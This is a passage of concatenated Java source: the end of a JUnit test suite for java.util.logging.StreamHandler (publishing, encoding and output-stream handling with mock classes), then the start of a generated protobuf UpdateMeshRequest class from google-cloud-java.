normal log record. 
*/ public void testPublish_NoFilter() { ByteArrayOutputStream aos = new ByteArrayOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); LogRecord r = new LogRecord(Level.INFO, "testPublish_NoFilter"); h.setLevel(Level.INFO); h.publish(r); h.flush(); assertEquals("MockFormatter_Head" + "testPublish_NoFilter", aos .toString()); h.setLevel(Level.WARNING); h.publish(r); h.flush(); assertEquals("MockFormatter_Head" + "testPublish_NoFilter", aos .toString()); h.setLevel(Level.CONFIG); h.publish(r); h.flush(); assertEquals("MockFormatter_Head" + "testPublish_NoFilter" + "testPublish_NoFilter", aos.toString()); r.setLevel(Level.OFF); h.setLevel(Level.OFF); h.publish(r); h.flush(); assertEquals("MockFormatter_Head" + "testPublish_NoFilter" + "testPublish_NoFilter", aos.toString()); } /* * Test publish(), use a filter, having output stream, normal log record. */ public void testPublish_WithFilter() { ByteArrayOutputStream aos = new ByteArrayOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); h.setFilter(new MockFilter()); LogRecord r = new LogRecord(Level.INFO, "testPublish_WithFilter"); h.setLevel(Level.INFO); h.publish(r); h.flush(); assertEquals("", aos.toString()); assertSame(r, CallVerificationStack.getInstance().pop()); h.setLevel(Level.WARNING); h.publish(r); h.flush(); assertEquals("", aos.toString()); assertTrue(CallVerificationStack.getInstance().empty()); h.setLevel(Level.CONFIG); h.publish(r); h.flush(); assertEquals("", aos.toString()); assertSame(r, CallVerificationStack.getInstance().pop()); r.setLevel(Level.OFF); h.setLevel(Level.OFF); h.publish(r); h.flush(); assertEquals("", aos.toString()); assertTrue(CallVerificationStack.getInstance().empty()); } /* * Test publish(), null log record, handler should call ErrorManager to * handle exceptional case */ public void testPublish_Null() { StreamHandler h = new StreamHandler(new ByteArrayOutputStream(), new SimpleFormatter()); h.publish(null); } /* * Test 
publish(), null log record, without output stream */ public void testPublish_Null_NoOutputStream() { StreamHandler h = new StreamHandler(); h.publish(null); // regression test for Harmony-1279 MockFilter filter = new MockFilter(); h.setLevel(Level.FINER); h.setFilter(filter); LogRecord record = new LogRecord(Level.FINE, "abc"); h.publish(record); // verify that filter.isLoggable is not called, because there's no // associated output stream. assertTrue(CallVerificationStack.getInstance().empty()); } /* * Test publish(), a log record with empty msg, having output stream */ public void testPublish_EmptyMsg() { ByteArrayOutputStream aos = new ByteArrayOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); LogRecord r = new LogRecord(Level.INFO, ""); h.publish(r); h.flush(); assertEquals("MockFormatter_Head", aos.toString()); } /* * Test publish(), a log record with null msg, having output stream */ public void testPublish_NullMsg() { ByteArrayOutputStream aos = new ByteArrayOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); LogRecord r = new LogRecord(Level.INFO, null); h.publish(r); h.flush(); assertEquals("MockFormatter_Head", aos.toString()); } /* * Test publish(), after close. */ public void testPublish_AfterClose() throws Exception { Properties p = new Properties(); p.put("java.util.logging.StreamHandler.level", "FINE"); LogManager.getLogManager().readConfiguration( EnvironmentHelper.PropertiesToInputStream(p)); ByteArrayOutputStream aos = new ByteArrayOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); assertSame(h.getLevel(), Level.FINE); LogRecord r = new LogRecord(Level.INFO, "testPublish_NoFormatter"); assertTrue(h.isLoggable(r)); h.close(); assertFalse(h.isLoggable(r)); h.publish(r); h.flush(); assertEquals("MockFormatter_HeadMockFormatter_Tail", aos.toString()); } /* * Test setEncoding() method with supported encoding. 
*/ public void testSetEncoding_Normal() throws Exception { ByteArrayOutputStream aos = new ByteArrayOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); h.setEncoding("iso-8859-1"); assertEquals("iso-8859-1", h.getEncoding()); LogRecord r = new LogRecord(Level.INFO, "\u6881\u884D\u8F69"); h.publish(r); h.flush(); byte[] bytes = encoder.encode( CharBuffer.wrap("MockFormatter_Head" + "\u6881\u884D\u8F69")) .array(); assertTrue(Arrays.equals(bytes, aos.toByteArray())); } /* * Test setEncoding() method with supported encoding, after a log record * has been written. */ public void testSetEncoding_AfterPublish() throws Exception { ByteArrayOutputStream aos = new ByteArrayOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); h.setEncoding("iso-8859-1"); assertEquals("iso-8859-1", h.getEncoding()); LogRecord r = new LogRecord(Level.INFO, "\u6881\u884D\u8F69"); h.publish(r); h.flush(); assertTrue(Arrays.equals(aos.toByteArray(), encoder.encode( CharBuffer.wrap("MockFormatter_Head" + "\u6881\u884D\u8F69")) .array())); h.setEncoding("iso8859-1"); assertEquals("iso8859-1", h.getEncoding()); r = new LogRecord(Level.INFO, "\u6881\u884D\u8F69"); h.publish(r); h.flush(); assertFalse(Arrays.equals(aos.toByteArray(), encoder.encode( CharBuffer.wrap("MockFormatter_Head" + "\u6881\u884D\u8F69" + "testSetEncoding_Normal2")).array())); byte[] b0 = aos.toByteArray(); byte[] b1 = encoder.encode( CharBuffer.wrap("MockFormatter_Head" + "\u6881\u884D\u8F69")) .array(); byte[] b2 = encoder.encode(CharBuffer.wrap("\u6881\u884D\u8F69")) .array(); byte[] b3 = new byte[b1.length + b2.length]; System.arraycopy(b1, 0, b3, 0, b1.length); System.arraycopy(b2, 0, b3, b1.length, b2.length); assertTrue(Arrays.equals(b0, b3)); } /* * Test setEncoding() methods with null. 
*/ public void testSetEncoding_Null() throws Exception { StreamHandler h = new StreamHandler(); h.setEncoding(null); assertNull(h.getEncoding()); } /* * Test setEncoding() methods with unsupported encoding. */ public void testSetEncoding_Unsupported() { StreamHandler h = new StreamHandler(); try { h.setEncoding("impossible"); fail("Should throw UnsupportedEncodingException!"); } catch (UnsupportedEncodingException e) { // expected } assertNull(h.getEncoding()); } /* * Test setEncoding() with insufficient privilege. */ public void testSetEncoding_InsufficientPrivilege() throws Exception { StreamHandler h = new StreamHandler(); SecurityManager oldMan = System.getSecurityManager(); System.setSecurityManager(new MockSecurityManager()); // set a normal value try { h.setEncoding("iso-8859-1"); fail("Should throw SecurityException!"); } catch (SecurityException e) { // expected } finally { System.setSecurityManager(oldMan); } assertNull(h.getEncoding()); System.setSecurityManager(new MockSecurityManager()); // set an invalid value try { h.setEncoding("impossible"); fail("Should throw SecurityException!"); } catch (SecurityException e) { // expected } finally { System.setSecurityManager(oldMan); } assertNull(h.getEncoding()); } /* * Test setEncoding() methods will flush a stream before setting. */ public void testSetEncoding_FlushBeforeSetting() throws Exception { ByteArrayOutputStream aos = new ByteArrayOutputStream(); StreamHandler h = new StreamHandler(aos, new MockFormatter()); LogRecord r = new LogRecord(Level.INFO, "abcd"); h.publish(r); assertFalse(aos.toString().indexOf("abcd") > 0); h.setEncoding("iso-8859-1"); assertTrue(aos.toString().indexOf("abcd") > 0); } /* * Test setOutputStream() with null. 
*/ public void testSetOutputStream_null() { MockStreamHandler h = new MockStreamHandler( new ByteArrayOutputStream(), new SimpleFormatter()); try { h.setOutputStream(null); fail("Should throw NullPointerException!"); } catch (NullPointerException e) { // expected } } /* * Test setOutputStream() under normal condition. */ public void testSetOutputStream_Normal() { ByteArrayOutputStream aos = new ByteArrayOutputStream(); MockStreamHandler h = new MockStreamHandler(aos, new MockFormatter()); LogRecord r = new LogRecord(Level.INFO, "testSetOutputStream_Normal"); h.publish(r); assertSame(r, CallVerificationStack.getInstance().pop()); assertTrue(CallVerificationStack.getInstance().empty()); h.flush(); assertEquals("MockFormatter_Head" + "testSetOutputStream_Normal", aos .toString()); ByteArrayOutputStream aos2 = new ByteArrayOutputStream(); h.setOutputStream(aos2); assertEquals("MockFormatter_Head" + "testSetOutputStream_Normal" + "MockFormatter_Tail", aos.toString()); r = new LogRecord(Level.INFO, "testSetOutputStream_Normal2"); h.publish(r); assertSame(r, CallVerificationStack.getInstance().pop()); assertTrue(CallVerificationStack.getInstance().empty()); h.flush(); assertEquals("MockFormatter_Head" + "testSetOutputStream_Normal2", aos2 .toString()); assertEquals("MockFormatter_Head" + "testSetOutputStream_Normal" + "MockFormatter_Tail", aos.toString()); } /* * Test setOutputStream() after close. 
*/ public void testSetOutputStream_AfterClose() { ByteArrayOutputStream aos = new ByteArrayOutputStream(); MockStreamHandler h = new MockStreamHandler(aos, new MockFormatter()); LogRecord r = new LogRecord(Level.INFO, "testSetOutputStream_Normal"); h.publish(r); assertSame(r, CallVerificationStack.getInstance().pop()); assertTrue(CallVerificationStack.getInstance().empty()); h.flush(); assertEquals("MockFormatter_Head" + "testSetOutputStream_Normal", aos .toString()); h.close(); ByteArrayOutputStream aos2 = new ByteArrayOutputStream(); h.setOutputStream(aos2); assertEquals("MockFormatter_Head" + "testSetOutputStream_Normal" + "MockFormatter_Tail", aos.toString()); r = new LogRecord(Level.INFO, "testSetOutputStream_Normal2"); h.publish(r); assertSame(r, CallVerificationStack.getInstance().pop()); assertTrue(CallVerificationStack.getInstance().empty()); h.flush(); assertEquals("MockFormatter_Head" + "testSetOutputStream_Normal2", aos2 .toString()); assertEquals("MockFormatter_Head" + "testSetOutputStream_Normal" + "MockFormatter_Tail", aos.toString()); } /* * Test setOutputStream() when having insufficient privilege. */ public void testSetOutputStream_InsufficientPrivilege() { MockStreamHandler h = new MockStreamHandler(); SecurityManager oldMan = System.getSecurityManager(); System.setSecurityManager(new MockSecurityManager()); try { h.setOutputStream(new ByteArrayOutputStream()); fail("Should throw SecurityException!"); } catch (SecurityException e) { // expected } finally { System.setSecurityManager(oldMan); } h = new MockStreamHandler(); System.setSecurityManager(new MockSecurityManager()); try { h.setOutputStream(null); fail("Should throw NullPointerException!"); } catch (NullPointerException e) { // expected } finally { System.setSecurityManager(oldMan); } } /* * A mock stream handler, expose setOutputStream. 
*/ public static class MockStreamHandler extends StreamHandler { public MockStreamHandler() { super(); } public MockStreamHandler(OutputStream out, Formatter formatter) { super(out, formatter); } public void setOutputStream(OutputStream out) { super.setOutputStream(out); } public boolean isLoggable(LogRecord r) { CallVerificationStack.getInstance().push(r); return super.isLoggable(r); } } /* * A mock filter, always return false. */ public static class MockFilter implements Filter { public boolean isLoggable(LogRecord record) { CallVerificationStack.getInstance().push(record); return false; } } /* * A mock formatter. */ public static class MockFormatter extends java.util.logging.Formatter { public String format(LogRecord r) { // System.out.println("formatter called..."); return super.formatMessage(r); } /* * (non-Javadoc) * * @see java.util.logging.Formatter#getHead(java.util.logging.Handler) */ public String getHead(Handler h) { return "MockFormatter_Head"; } /* * (non-Javadoc) * * @see java.util.logging.Formatter#getTail(java.util.logging.Handler) */ public String getTail(Handler h) { return "MockFormatter_Tail"; } } /* * Another mock formatter. */ public static class MockFormatter2 extends java.util.logging.Formatter { public String format(LogRecord r) { // System.out.println("formatter2 called..."); return r.getMessage(); } } /* * A mock output stream. */ public static class MockOutputStream extends ByteArrayOutputStream { /* * (non-Javadoc) * * @see java.io.OutputStream#close() */ public void close() throws IOException { CallVerificationStack.getInstance().push(null); super.close(); } /* * (non-Javadoc) * * @see java.io.OutputStream#flush() */ public void flush() throws IOException { CallVerificationStack.getInstance().push(null); super.flush(); } /* * (non-Javadoc) * * @see java.io.OutputStream#write(int) */ public void write(int oneByte) { // TODO Auto-generated method stub super.write(oneByte); } } /* * A mock output stream that always throw exception. 
*/ public static class MockExceptionOutputStream extends ByteArrayOutputStream { /* * (non-Javadoc) * * @see java.io.OutputStream#close() */ public void close() throws IOException { throw new IOException(); } /* * (non-Javadoc) * * @see java.io.OutputStream#flush() */ public void flush() throws IOException { throw new IOException(); } /* * (non-Javadoc) * * @see java.io.OutputStream#write(byte[], int, int) */ public synchronized void write(byte[] buffer, int offset, int count) { throw new NullPointerException(); } /* * (non-Javadoc) * * @see java.io.OutputStream#write(int) */ public synchronized void write(int oneByte) { throw new NullPointerException(); } } /* * Used to grant all permissions except logging control. */ public static class MockSecurityManager extends SecurityManager { public MockSecurityManager() { } public void checkPermission(Permission perm) { // grant all permissions except logging control if (perm instanceof LoggingPermission) { throw new SecurityException(); } } public void checkPermission(Permission perm, Object context) { // grant all permissions except logging control if (perm instanceof LoggingPermission) { throw new SecurityException(); } } } }
googleapis/google-cloud-java
35,842
java-networkservices/proto-google-cloud-networkservices-v1/src/main/java/com/google/cloud/networkservices/v1/UpdateMeshRequest.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/networkservices/v1/mesh.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.networkservices.v1; /** * * * <pre> * Request used by the UpdateMesh method. * </pre> * * Protobuf type {@code google.cloud.networkservices.v1.UpdateMeshRequest} */ public final class UpdateMeshRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.networkservices.v1.UpdateMeshRequest) UpdateMeshRequestOrBuilder { private static final long serialVersionUID = 0L; // Use UpdateMeshRequest.newBuilder() to construct. 
private UpdateMeshRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private UpdateMeshRequest() {} @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new UpdateMeshRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.networkservices.v1.MeshProto .internal_static_google_cloud_networkservices_v1_UpdateMeshRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.networkservices.v1.MeshProto .internal_static_google_cloud_networkservices_v1_UpdateMeshRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.networkservices.v1.UpdateMeshRequest.class, com.google.cloud.networkservices.v1.UpdateMeshRequest.Builder.class); } private int bitField0_; public static final int UPDATE_MASK_FIELD_NUMBER = 1; private com.google.protobuf.FieldMask updateMask_; /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return Whether the updateMask field is set. */ @java.lang.Override public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. 
If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return The updateMask. */ @java.lang.Override public com.google.protobuf.FieldMask getUpdateMask() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> */ @java.lang.Override public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } public static final int MESH_FIELD_NUMBER = 2; private com.google.cloud.networkservices.v1.Mesh mesh_; /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code>.google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the mesh field is set. */ @java.lang.Override public boolean hasMesh() { return ((bitField0_ & 0x00000002) != 0); } /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code>.google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The mesh. */ @java.lang.Override public com.google.cloud.networkservices.v1.Mesh getMesh() { return mesh_ == null ? com.google.cloud.networkservices.v1.Mesh.getDefaultInstance() : mesh_; } /** * * * <pre> * Required. Updated Mesh resource. 
* </pre> * * <code>.google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ @java.lang.Override public com.google.cloud.networkservices.v1.MeshOrBuilder getMeshOrBuilder() { return mesh_ == null ? com.google.cloud.networkservices.v1.Mesh.getDefaultInstance() : mesh_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(1, getUpdateMask()); } if (((bitField0_ & 0x00000002) != 0)) { output.writeMessage(2, getMesh()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, getUpdateMask()); } if (((bitField0_ & 0x00000002) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(2, getMesh()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.networkservices.v1.UpdateMeshRequest)) { return super.equals(obj); } com.google.cloud.networkservices.v1.UpdateMeshRequest other = (com.google.cloud.networkservices.v1.UpdateMeshRequest) obj; if (hasUpdateMask() != other.hasUpdateMask()) return false; if (hasUpdateMask()) { if (!getUpdateMask().equals(other.getUpdateMask())) return false; } if (hasMesh() != other.hasMesh()) return false; if (hasMesh()) { if (!getMesh().equals(other.getMesh())) return false; } if 
(!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (hasUpdateMask()) { hash = (37 * hash) + UPDATE_MASK_FIELD_NUMBER; hash = (53 * hash) + getUpdateMask().hashCode(); } if (hasMesh()) { hash = (37 * hash) + MESH_FIELD_NUMBER; hash = (53 * hash) + getMesh().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static 
com.google.cloud.networkservices.v1.UpdateMeshRequest parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.networkservices.v1.UpdateMeshRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == 
DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Request used by the UpdateMesh method. * </pre> * * Protobuf type {@code google.cloud.networkservices.v1.UpdateMeshRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.networkservices.v1.UpdateMeshRequest) com.google.cloud.networkservices.v1.UpdateMeshRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.networkservices.v1.MeshProto .internal_static_google_cloud_networkservices_v1_UpdateMeshRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.networkservices.v1.MeshProto .internal_static_google_cloud_networkservices_v1_UpdateMeshRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.networkservices.v1.UpdateMeshRequest.class, com.google.cloud.networkservices.v1.UpdateMeshRequest.Builder.class); } // Construct using com.google.cloud.networkservices.v1.UpdateMeshRequest.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) { getUpdateMaskFieldBuilder(); getMeshFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } mesh_ = null; if (meshBuilder_ != null) { 
meshBuilder_.dispose(); meshBuilder_ = null; } return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.networkservices.v1.MeshProto .internal_static_google_cloud_networkservices_v1_UpdateMeshRequest_descriptor; } @java.lang.Override public com.google.cloud.networkservices.v1.UpdateMeshRequest getDefaultInstanceForType() { return com.google.cloud.networkservices.v1.UpdateMeshRequest.getDefaultInstance(); } @java.lang.Override public com.google.cloud.networkservices.v1.UpdateMeshRequest build() { com.google.cloud.networkservices.v1.UpdateMeshRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.networkservices.v1.UpdateMeshRequest buildPartial() { com.google.cloud.networkservices.v1.UpdateMeshRequest result = new com.google.cloud.networkservices.v1.UpdateMeshRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.cloud.networkservices.v1.UpdateMeshRequest result) { int from_bitField0_ = bitField0_; int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000001) != 0)) { result.updateMask_ = updateMaskBuilder_ == null ? updateMask_ : updateMaskBuilder_.build(); to_bitField0_ |= 0x00000001; } if (((from_bitField0_ & 0x00000002) != 0)) { result.mesh_ = meshBuilder_ == null ? 
mesh_ : meshBuilder_.build(); to_bitField0_ |= 0x00000002; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.networkservices.v1.UpdateMeshRequest) { return mergeFrom((com.google.cloud.networkservices.v1.UpdateMeshRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.networkservices.v1.UpdateMeshRequest other) { if (other == com.google.cloud.networkservices.v1.UpdateMeshRequest.getDefaultInstance()) return this; if (other.hasUpdateMask()) { mergeUpdateMask(other.getUpdateMask()); } if (other.hasMesh()) { mergeMesh(other.getMesh()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new 
java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage(getUpdateMaskFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000001; break; } // case 10 case 18: { input.readMessage(getMeshFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000002; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private com.google.protobuf.FieldMask updateMask_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> updateMaskBuilder_; /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return Whether the updateMask field is set. */ public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. 
* </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> * * @return The updateMask. */ public com.google.protobuf.FieldMask getUpdateMask() { if (updateMaskBuilder_ == null) { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } else { return updateMaskBuilder_.getMessage(); } } /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (value == null) { throw new NullPointerException(); } updateMask_ = value; } else { updateMaskBuilder_.setMessage(value); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask.Builder builderForValue) { if (updateMaskBuilder_ == null) { updateMask_ = builderForValue.build(); } else { updateMaskBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. 
